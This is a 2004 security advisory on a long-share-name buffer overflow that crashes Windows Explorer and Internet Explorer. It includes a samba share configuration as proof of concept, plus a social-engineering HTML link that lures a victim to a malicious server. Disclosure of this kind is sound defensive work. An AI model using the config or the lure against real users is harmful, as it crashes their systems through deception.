Microsoft Explorer and Internet Explorer Long Share Name Buffer Overflow
26 Apr. 2004
MS Explorer (explorer.exe) and MS Internet Explorer(IEXPLORE.EXE) are core pieces of Microsoft Windows Operating Systems. An unchecked buffer allows a malicious user to crash Microsoft Explorer by creating a long shared directory name, and convincing the user to access it.
MS Internet Explorer, MS Explorer (explorer.exe) on Platforms:
* Windows XP(All), Windows 2000(All), Windows 98(All), Windows ME(All)
* Windows 2003 not tested
In order to exploit this, an attacker must be able to get a user to connect to a malicious server that contains a share name equal or longer than 300 characters.
Proof of Concept:
Windows will not allow you to create such a long share, but of course samba includes the feature. After your samba box is up and running create a share in your smb.conf:
[A x 300]
comment = Area 51
path = /tmp/testfolder
public = yes
writable = yes
printable = no
browseable = yes
write list = @trymywingchung
After your server is up, just get to your windows test box and get to the start menu > run > \\your.malicious.server.ip.
Plufff, explorer will crash.
Or By Social Engineering: <a href="\\my.malicious.server.ip">Enter My 0day sploit archive l/p:n0ph33r</a>
From your network card settings disable the Client for Microsoft networks until an official fix for this vulnerability is available.
Rodrigo Gutierrez notified the vendor in the beginning of 2002, this vulnerability was supposed to be fixed in Windows XP service pack 1 in XP and Windows 2000 SP4 according to the vendors knowledge base article 322857.